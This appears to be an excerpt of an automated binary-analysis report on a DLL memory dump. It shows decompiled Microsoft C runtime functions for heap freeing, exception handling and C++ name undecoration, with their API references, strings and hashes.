0x6e1c0c5f
0x6e1c0c63
0x6e1c0c69
0x6e1c0c6c
0x6e1c0c71
0x6e1c0c75
0x6e1c0c7b
0x6e1c0c7e
0x6e1c0c83
0x6e1c0c87
0x6e1c0c8d
0x6e1c0c90
0x6e1c0c95
0x6e1c0c96
0x6e1c0c99
0x6e1c0c9f
0x00000000
0x6e1c0ca7
0x6e1c0c9f
0x6e1c0caa

APIs

_free.LIBCMT ref: 6E1C0C5A

Part of subcall function 6E1B110D: HeapFree.KERNEL32(00000000,00000000,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?), ref: 6E1B1123
Part of subcall function 6E1B110D: GetLastError.KERNEL32(?,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?,?), ref: 6E1B1135

_free.LIBCMT ref: 6E1C0C6C
_free.LIBCMT ref: 6E1C0C7E
_free.LIBCMT ref: 6E1C0C90
_free.LIBCMT ref: 6E1C0CA2

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5eac04e6e18ff13802b069f05a420765905545ac907d57daee53e072a15d6525
Instruction ID: 48dc1f315c2c2d4e06561d7a54a96cf3e726c025044d330aef704d6f5f573645
Opcode Fuzzy Hash: 5eac04e6e18ff13802b069f05a420765905545ac907d57daee53e072a15d6525
Instruction Fuzzy Hash: EAF0A4B2B00655978A50CAA4D18EC9773DDEA256513A10C04F068D3400CB34FCC1EAE8

Uniqueness

Uniqueness Score: -1.00%

Function 6E192A00, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E192A00(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v38;
				short _v40;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v72;
				intOrPtr _v76;
				void* _v96;
				char _v100;
				char _v104;
				char _v112;
				intOrPtr _v116;
				char _v124;
				char _v128;
				signed int _t49;
				signed int _t50;
				short _t52;
				void* _t53;
				intOrPtr* _t60;
				intOrPtr _t70;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr* _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t108;
				intOrPtr* _t110;
				signed int _t115;
				void* _t116;

				_t113 = _t115;
				_push(0xffffffff);
				_push(E6E202BA5);
				_push( *[fs:0x0]);
				_t116 = _t115 - 0x58;
				_t49 =  *0x6e212008; // 0xa172442e
				_t50 = _t49 ^ _t115;
				_v24 = _t50;
				_push(__ebx);
				_push(__edi);
				_push(_t50);
				 *[fs:0x0] =  &_v16;
				_t80 = __edx;
				_t105 = __ecx;
				_v100 = __ecx;
				_t108 = _a4;
				_v100 = __ecx;
				asm("movq xmm0, [0x6e20ba6c]");
				_t52 =  *0x6e20ba74; // 0x726f
				_v28 = 0xf;
				_v32 = 0xa;
				asm("movq [ebp-0x2c], xmm0");
				_v40 = _t52;
				_v38 = 0;
				_v8 = 0;
				_t53 = E6E1925A0(__edx,  &_v72,  &_v48, __ecx, __edx);
				_v8 = 1;
				E6E195230(_t53, _t108);
				_t98 = _v52;
				if(_t98 < 0x10) {
					L4:
					_t99 = _v28;
					_v56 = 0;
					_v52 = 0xf;
					_v72 = 0;
					if(_t99 < 0x10) {
						L8:
						_t25 = _t105 + 0x14; // 0xa1724442
						asm("xorps xmm0, xmm0");
						_v100 = 1;
						asm("movq [edi+0x4], xmm0");
						_t86 =  >=  ? _v96 :  &_v96;
						 *_t105 = 0x6e20eb38;
						 *((intOrPtr*)(_t105 + 0xc)) = _t80;
						 *((intOrPtr*)(_t105 + 0x10)) = 0x6e204274;
						asm("movq [eax], xmm0");
						_v104 =  >=  ? _v96 :  &_v96;
						E6E19B603( &_v104, _t25);
						_t100 = _v76;
						_t116 = _t116 + 8;
						 *((intOrPtr*)(_t105 + 0x10)) = 0x6e2042ec;
						 *_t105 = 0x6e20eb98;
						if(_t100 < 0x10) {
							L12:
							 *[fs:0x0] = _v16;
							return E6E199EE7(_v24 ^ _t113);
						} else {
							_t91 = _v96;
							_t101 = _t100 + 1;
							_t60 = _t91;
							if(_t101 < 0x1000) {
								L11:
								_push(_t101);
								E6E19A3FB(_t91);
								goto L12;
							} else {
								_t91 =  *((intOrPtr*)(_t91 - 4));
								_t101 = _t101 + 0x23;
								if(_t60 - _t91 + 0xfffffffc > 0x1f) {
									goto L14;
								} else {
									goto L11;
								}
							}
						}
					} else {
						_t93 = _v48;
						_t102 = _t99 + 1;
						_t70 = _t93;
						if(_t102 < 0x1000) {
							L7:
							_push(_t102);
							E6E19A3FB(_t93);
							_t116 = _t116 + 8;
							goto L8;
						} else {
							_t91 =  *((intOrPtr*)(_t93 - 4));
							_t101 = _t102 + 0x23;
							if(_t70 - _t91 + 0xfffffffc > 0x1f) {
								goto L13;
							} else {
								goto L7;
							}
						}
					}
				} else {
					_t94 = _v72;
					_t103 = _t98 + 1;
					_t75 = _t94;
					if(_t103 < 0x1000) {
						L3:
						_push(_t103);
						E6E19A3FB(_t94);
						_t116 = _t116 + 8;
						goto L4;
					} else {
						_t91 =  *((intOrPtr*)(_t94 - 4));
						_t101 = _t103 + 0x23;
						if(_t75 - _t91 + 0xfffffffc > 0x1f) {
							L13:
							E6E1AD960(_t80, _t91, _t101, _t105, __eflags);
							L14:
							E6E1AD960(_t80, _t91, _t101, _t105, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("xorps xmm0, xmm0");
							_push(_t108);
							_t110 = _t91;
							_v124 = 1;
							asm("movq [esi+0x4], xmm0");
							 *((intOrPtr*)(_t110 + 0xc)) = _v116;
							_v128 = _v112;
							 *_t110 = 0x6e20eb38;
							 *((intOrPtr*)(_t110 + 0x10)) = 0x6e204274;
							asm("movq [ecx], xmm0");
							E6E19B603( &_v128, _t110 + 0x14);
							 *((intOrPtr*)(_t110 + 0x10)) = 0x6e2042ec;
							 *_t110 = 0x6e20eb98;
							return _t110;
						} else {
							goto L3;
						}
					}
				}
			}

0x6e192a01
0x6e192a03
0x6e192a05
0x6e192a10
0x6e192a11
0x6e192a14
0x6e192a19
0x6e192a1b
0x6e192a1e
0x6e192a20
0x6e192a21
0x6e192a25
0x6e192a2b
0x6e192a2d
0x6e192a2f
0x6e192a32
0x6e192a35
0x6e192a38
0x6e192a40
0x6e192a46
0x6e192a4d
0x6e192a54
0x6e192a59
0x6e192a5d
0x6e192a65
0x6e192a6f
0x6e192a77
0x6e192a7e
0x6e192a83
0x6e192a89
0x6e192ab7
0x6e192ab7
0x6e192aba
0x6e192ac1
0x6e192ac8
0x6e192acf
0x6e192afd
0x6e192b01
0x6e192b04
0x6e192b07
0x6e192b0b
0x6e192b13
0x6e192b17
0x6e192b1d
0x6e192b20
0x6e192b28
0x6e192b30
0x6e192b33
0x6e192b38
0x6e192b3b
0x6e192b3e
0x6e192b45
0x6e192b4e
0x6e192b78
0x6e192b7d
0x6e192b95
0x6e192b50
0x6e192b50
0x6e192b53
0x6e192b54
0x6e192b5c
0x6e192b6e
0x6e192b6e
0x6e192b70
0x00000000
0x6e192b5e
0x6e192b5e
0x6e192b61
0x6e192b6c
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192b6c
0x6e192b5c
0x6e192ad1
0x6e192ad1
0x6e192ad4
0x6e192ad5
0x6e192add
0x6e192af3
0x6e192af3
0x6e192af5
0x6e192afa
0x00000000
0x6e192adf
0x6e192adf
0x6e192ae2
0x6e192aed
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192aed
0x6e192add
0x6e192a8b
0x6e192a8b
0x6e192a8e
0x6e192a8f
0x6e192a97
0x6e192aad
0x6e192aad
0x6e192aaf
0x6e192ab4
0x00000000
0x6e192a99
0x6e192a99
0x6e192a9c
0x6e192aa7
0x6e192b98
0x6e192b98
0x6e192b9d
0x6e192b9d
0x6e192ba2
0x6e192ba3
0x6e192ba4
0x6e192ba5
0x6e192ba6
0x6e192ba7
0x6e192ba8
0x6e192ba9
0x6e192baa
0x6e192bab
0x6e192bac
0x6e192bad
0x6e192bae
0x6e192baf
0x6e192bb7
0x6e192bba
0x6e192bbb
0x6e192bbd
0x6e192bc6
0x6e192bcb
0x6e192bd2
0x6e192bda
0x6e192be0
0x6e192be8
0x6e192bec
0x6e192bf4
0x6e192bfb
0x6e192c07
0x00000000
0x00000000
0x00000000
0x6e192aa7
0x6e192a97

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6E192B33
___std_exception_copy.LIBVCRUNTIME ref: 6E192BEC

Strings

type_error, xrefs: 6E192A38
B n, xrefs: 6E192BF4

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: type_error$B n
API String ID: 2659868963-2563083636
Opcode ID: c9229e537379f636ab35ba47477c2c28fcc0c2950ce44fc816cc315a8fec276a
Instruction ID: 609439d80a589f94c760f96b256101e861e37f588f324a0d29f17ad05403d619
Opcode Fuzzy Hash: c9229e537379f636ab35ba47477c2c28fcc0c2950ce44fc816cc315a8fec276a
Instruction Fuzzy Hash: AA51AD71A106099BDB14CFA8C880BDDFBB9FF59314F108619E459A7680E770A984DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0183, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A0183(intOrPtr* _a4) {
				char* _v8;
				void* _v12;
				char* _v16;
				char* _v20;
				intOrPtr _v24;
				char* _v28;
				char _v36;
				char _v44;
				signed char _t50;
				intOrPtr* _t55;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				void* _t68;
				signed int _t74;
				unsigned int _t76;
				intOrPtr* _t84;
				intOrPtr _t99;
				signed int _t104;

				_t84 =  *0x6e21304c; // 0x0
				_t99 =  *_t84;
				if(_t99 != 0) {
					_v20 = 0;
					_v16 = 0;
					__eflags = _t99 - 0x57;
					if(_t99 != 0x57) {
						_t104 =  *0x6e213054; // 0x0
						_t50 =  !(_t104 >> 0xf);
						__eflags = _t50 & 0x00000001;
						if((_t50 & 0x00000001) == 0) {
							goto L4;
						} else {
							__eflags = _t104 & 0x00001000;
							if((_t104 & 0x00001000) != 0) {
								goto L4;
							} else {
								goto L9;
							}
						}
					} else {
						_t76 =  *0x6e213054; // 0x0
						__eflags =  !(_t76 >> 0xf) & 0x00000001;
						if(( !(_t76 >> 0xf) & 0x00000001) != 0) {
							L9:
							_v12 = 0;
							_v8 = 0;
							 *0x6e21304c = _t84 + 1;
							_t59 = _t99 - 0x54;
							__eflags = _t59;
							if(_t59 == 0) {
								_v28 = "union ";
								goto L21;
							} else {
								_t64 = _t59 - 1;
								__eflags = _t64;
								if(_t64 == 0) {
									_v28 = "struct ";
									_v24 = 7;
									goto L22;
								} else {
									_t65 = _t64 - 1;
									__eflags = _t65;
									if(_t65 == 0) {
										_v28 = "class ";
										L21:
										_v24 = 6;
										goto L22;
									} else {
										_t66 = _t65 - 1;
										__eflags = _t66;
										if(_t66 == 0) {
											_v28 = "enum ";
											_v24 = 5;
											_t68 = E6E1A0324( &_v36);
											E6E19D8A2(E6E19D46F( &_v44,  &_v28),  &_v28, _t68);
											_v12 = _v28;
											_v8 = _v24;
										} else {
											_t74 = _t66 - 1;
											__eflags = _t74;
											if(_t74 == 0) {
												_v28 = "coclass ";
												_v24 = 8;
												goto L22;
											} else {
												__eflags = _t74 - 1;
												if(__eflags == 0) {
													_v28 = "cointerface ";
													_v24 = 0xc;
													L22:
													E6E19D731( &_v12,  &_v28);
												}
											}
										}
									}
								}
							}
							_v20 = _v12;
							_v16 = _v8;
						} else {
							L4:
							 *0x6e21304c = _t84 + 1;
							__eflags = _t99 - 0x57;
							if(__eflags == 0) {
								E6E1A0324( &_v44);
							}
						}
					}
					E6E1A1DC5(_t99, __eflags,  &_v28);
					E6E19D99C( &_v20,  &_v28);
					_t55 = _a4;
					 *_t55 = _v20;
					 *((intOrPtr*)(_t55 + 4)) = _v16;
					return _t55;
				} else {
					_v20 = "`unknown ecsu\'";
					_v16 = 0xe;
					E6E19D908(E6E19D46F( &_v28,  &_v20), _a4, 1);
					return _a4;
				}
			}

0x6e1a0186
0x6e1a018f
0x6e1a0193
0x6e1a01c4
0x6e1a01c7
0x6e1a01ca
0x6e1a01cd
0x6e1a021c
0x6e1a0227
0x6e1a0229
0x6e1a022b
0x00000000
0x6e1a022d
0x6e1a022d
0x6e1a0233
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a0233
0x6e1a01cf
0x6e1a01cf
0x6e1a01d9
0x6e1a01dc
0x6e1a0235
0x6e1a0239
0x6e1a023c
0x6e1a023f
0x6e1a0245
0x6e1a0245
0x6e1a0248
0x6e1a02e8
0x00000000
0x6e1a024e
0x6e1a024e
0x6e1a024e
0x6e1a0251
0x6e1a02d8
0x6e1a02df
0x00000000
0x6e1a0257
0x6e1a0257
0x6e1a0257
0x6e1a025a
0x6e1a02cf
0x6e1a02ef
0x6e1a02ef
0x00000000
0x6e1a025c
0x6e1a025c
0x6e1a025c
0x6e1a025f
0x6e1a0292
0x6e1a029a
0x6e1a02a1
0x6e1a02bc
0x6e1a02c4
0x6e1a02ca
0x6e1a0261
0x6e1a0261
0x6e1a0261
0x6e1a0264
0x6e1a027f
0x6e1a0286
0x00000000
0x6e1a0266
0x6e1a0266
0x6e1a0269
0x6e1a026f
0x6e1a0276
0x6e1a02f6
0x6e1a02fd
0x6e1a02fd
0x6e1a0269
0x6e1a0264
0x6e1a025f
0x6e1a025a
0x6e1a0251
0x6e1a0305
0x6e1a030b
0x6e1a01de
0x6e1a01de
0x6e1a01df
0x6e1a01e5
0x6e1a01e8
0x6e1a01ee
0x6e1a01f3
0x6e1a01e8
0x6e1a01dc
0x6e1a01f8
0x6e1a0205
0x6e1a020a
0x6e1a0212
0x6e1a0217
0x6e1a021b
0x6e1a0195
0x6e1a0198
0x6e1a01a3
0x6e1a01b6
0x6e1a01bf
0x6e1a01bf

APIs

DName::operator+.LIBCMT ref: 6E1A01B6

Part of subcall function 6E19D908: DName::operator+=.LIBCMT ref: 6E19D91E

Strings

U n, xrefs: 6E1A0292

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+Name::operator+=
String ID: U n
API String ID: 382699925-2124842448
Opcode ID: 78358574b3b3663b6b7740a6f5af9fe717c01049be4debaff71b65510718d53f
Instruction ID: 6fa85d610fd8e1a00ca1e7b66572efbd581c2b7c4dc4eaf579d1c418854c6f18
Opcode Fuzzy Hash: 78358574b3b3663b6b7740a6f5af9fe717c01049be4debaff71b65510718d53f
Instruction Fuzzy Hash: BB4128B5D4020A9FCF40CFE8C585AFEBFBABB15314F10441AD605B7240E7749A88EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1621, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E6E1A1621(void* __ebx, void* __esi, intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v28;
				intOrPtr* _t47;
				intOrPtr* _t52;
				void* _t65;
				intOrPtr _t66;
				char* _t69;
				intOrPtr _t77;
				void* _t78;
				signed int* _t79;

				_t78 = __esi;
				_t65 = __ebx;
				_t47 =  *0x6e21304c; // 0x0
				_t66 =  *_t47;
				if(_t66 == 0) {
					E6E19D85E(_t66, _a4, 1, _a8);
					goto L28;
				} else {
					if(_a12 == 0) {
						L12:
						_t66 =  *_t47;
						if(_t66 != 0x24) {
							if(_t66 != 0x59) {
								goto L20;
							} else {
								 *0x6e21304c = _t47 + 1;
								E6E19ECE6(_t65, _a4, _a8);
								goto L29;
							}
						} else {
							if( *((intOrPtr*)(_t47 + 1)) != _t66 ||  *((char*)(_t47 + 2)) != 0x54) {
								L20:
								_push(_t78);
								_t79 = _a8;
								E6E19EF3E( &_v12, _t79);
								if(( *(_t79 + 4) & 0x00004000) == 0) {
									if(( *(_t79 + 4) & 0x00002000) == 0) {
										_t77 = _v8;
										_t69 = _v12;
									} else {
										_v20 = "cli::pin_ptr<";
										_v16 = 0xd;
										goto L22;
									}
								} else {
									_v20 = "cli::array<";
									_v16 = 0xb;
									L22:
									E6E19D8A2(E6E19D46F( &_v28,  &_v20),  &_v20,  &_v12);
									_t69 = _v20;
									_t77 = _v16;
								}
								_t52 = _a4;
								 *_t52 = _t69;
								 *((intOrPtr*)(_t52 + 4)) = _t77;
								return _t52;
							} else {
								 *0x6e21304c = _t47 + 3;
								_t59 = _a8;
								if( *_a8 != 0) {
									_v20 = "std::nullptr_t ";
									_v16 = 0xf;
									goto L7;
								} else {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									goto L5;
								}
								goto L29;
							}
						}
					} else {
						if(_t66 != 0x58) {
							if(_t66 == 0x5f &&  *((intOrPtr*)(_t47 + 1)) == _t66 &&  *((char*)(_t47 + 2)) == 0x5a) {
								_t47 = _t47 + 3;
								 *0x6e21304c = _t47;
							}
							goto L12;
						} else {
							 *0x6e21304c = _t47 + 1;
							_t59 = _a8;
							if( *_a8 != 0) {
								_v20 = "void ";
								_v16 = 5;
								L7:
								E6E19D811(_t66, _a4,  &_v20, _t59);
								L28:
							} else {
								_v20 = "void";
								_v16 = 4;
								L5:
								E6E19D46F(_a4,  &_v20);
							}
							L29:
							return _a4;
						}
					}
				}
			}

0x6e1a1621
0x6e1a1621
0x6e1a1624
0x6e1a162c
0x6e1a1630
0x6e1a1781
0x00000000
0x6e1a1636
0x6e1a163a
0x6e1a16a6
0x6e1a16a6
0x6e1a16ab
0x6e1a16eb
0x00000000
0x6e1a16ed
0x6e1a16f4
0x6e1a16f9
0x00000000
0x6e1a16ff
0x6e1a16ad
0x6e1a16b0
0x6e1a1705
0x6e1a1705
0x6e1a1706
0x6e1a170e
0x6e1a171c
0x6e1a1756
0x6e1a1768
0x6e1a176b
0x6e1a1758
0x6e1a1758
0x6e1a175f
0x00000000
0x6e1a175f
0x6e1a171e
0x6e1a171e
0x6e1a1725
0x6e1a172c
0x6e1a1742
0x6e1a1747
0x6e1a174a
0x6e1a174a
0x6e1a176e
0x6e1a1772
0x6e1a1774
0x6e1a1778
0x6e1a16b8
0x6e1a16bb
0x6e1a16c0
0x6e1a16c6
0x6e1a16d8
0x6e1a16df
0x00000000
0x6e1a16c8
0x6e1a16c8
0x6e1a16cf
0x00000000
0x6e1a16cf
0x00000000
0x6e1a16c6
0x6e1a16b0
0x6e1a163c
0x6e1a163f
0x6e1a1691
0x6e1a169e
0x6e1a16a1
0x6e1a16a1
0x00000000
0x6e1a1641
0x6e1a1642
0x6e1a1647
0x6e1a164d
0x6e1a166e
0x6e1a1675
0x6e1a167c
0x6e1a1684
0x6e1a1786
0x6e1a164f
0x6e1a164f
0x6e1a1656
0x6e1a165d
0x6e1a1664
0x6e1a1664
0x6e1a1789
0x6e1a178d
0x6e1a178d
0x6e1a163f
0x6e1a163a

APIs

operator+.LIBVCRUNTIME ref: 6E1A1684
DName::operator+.LIBCMT ref: 6E1A1742
operator+.LIBVCRUNTIME ref: 6E1A1781

Strings

hT n, xrefs: 6E1A166E

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: operator+$Name::operator+
String ID: hT n
API String ID: 1198235884-2347626081
Opcode ID: f797b65bb012cb42fc5a110ba4275c2d9df4129bd886457257ce08507db41d4d
Instruction ID: 68ae302f4f1ef7a36655f2bc01f718a5bd61881cbda1d9ab8bbd66f6b917ba2b
Opcode Fuzzy Hash: f797b65bb012cb42fc5a110ba4275c2d9df4129bd886457257ce08507db41d4d
Instruction Fuzzy Hash: 084149B9A04209AFDF11CFD8C845BEE7BF6BB01314F158449E6249B281D7B49688EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C651, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E19C651(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_t75 = E6E19BF1F(_t96, __ecx, __edx, _t113, _t121, _t113);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer();
						_t121 = _t75;
						if( *((intOrPtr*)(E6E19BF1F(_t96, __ecx, __edx, 0, _t121, 0) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E19B2CA(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E19B1FC(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E19C21B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E1AF464(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6e19c651
0x6e19c651
0x6e19c658
0x6e19c661
0x6e19c780
0x6e19c667
0x6e19c667
0x6e19c669
0x6e19c673
0x6e19c676
0x6e19c67c
0x6e19c686
0x6e19c6ab
0x6e19c6b0
0x6e19c6b5
0x6e19c77c
0x00000000
0x6e19c77d
0x6e19c6b5
0x6e19c686
0x6e19c6bb
0x6e19c6be
0x6e19c6c1
0x6e19c6c7
0x6e19c6cd
0x6e19c6df
0x6e19c6e4
0x6e19c6e7
0x6e19c6ea
0x6e19c6ed
0x6e19c6f0
0x6e19c6f6
0x6e19c6fc
0x6e19c6ff
0x6e19c702
0x6e19c711
0x6e19c712
0x6e19c712
0x6e19c717
0x6e19c72a
0x6e19c72c
0x6e19c731
0x6e19c73c
0x6e19c73e
0x6e19c740
0x6e19c75c
0x6e19c761
0x6e19c764
0x6e19c764
0x6e19c73c
0x6e19c731
0x6e19c76a
0x6e19c76b
0x6e19c76e
0x6e19c771
0x6e19c774
0x6e19c777
0x6e19c702
0x00000000
0x6e19c6f6
0x6e19c781
0x6e19c786
0x6e19c78a
0x6e19c78d
0x6e19c78e
0x6e19c78f
0x6e19c790
0x6e19c795
0x6e19c80d
0x6e19c80f
0x6e19c797
0x6e19c797
0x6e19c79d
0x00000000
0x6e19c79f
0x6e19c7a2
0x6e19c7a5
0x6e19c7ac
0x6e19c7af
0x6e19c7b3
0x6e19c7e5
0x6e19c7e8
0x6e19c7ef
0x6e19c7f5
0x6e19c7ff
0x6e19c808
0x6e19c808
0x6e19c7ff
0x6e19c7f5
0x6e19c809
0x6e19c7b5
0x6e19c7b5
0x6e19c7b5
0x6e19c7b8
0x6e19c7b8
0x6e19c7bc
0x00000000
0x00000000
0x6e19c7c0
0x6e19c7d4
0x6e19c7d4
0x6e19c7c2
0x6e19c7c2
0x6e19c7c8
0x00000000
0x6e19c7ca
0x6e19c7ca
0x6e19c7cd
0x6e19c7d2
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19c7d2
0x6e19c7c8
0x6e19c7dd
0x6e19c7df
0x00000000
0x6e19c7e1
0x6e19c7e1
0x6e19c7e1
0x00000000
0x6e19c7df
0x6e19c7d8
0x6e19c7da
0x00000000
0x6e19c7da
0x00000000
0x00000000
0x00000000
0x6e19c7a5
0x6e19c79d
0x6e19c810
0x6e19c814
0x6e19c814

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E19C676
CatchIt.LIBVCRUNTIME ref: 6E19C75C

Strings

RCC, xrefs: 6E19C690
MOC, xrefs: 6E19C688

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
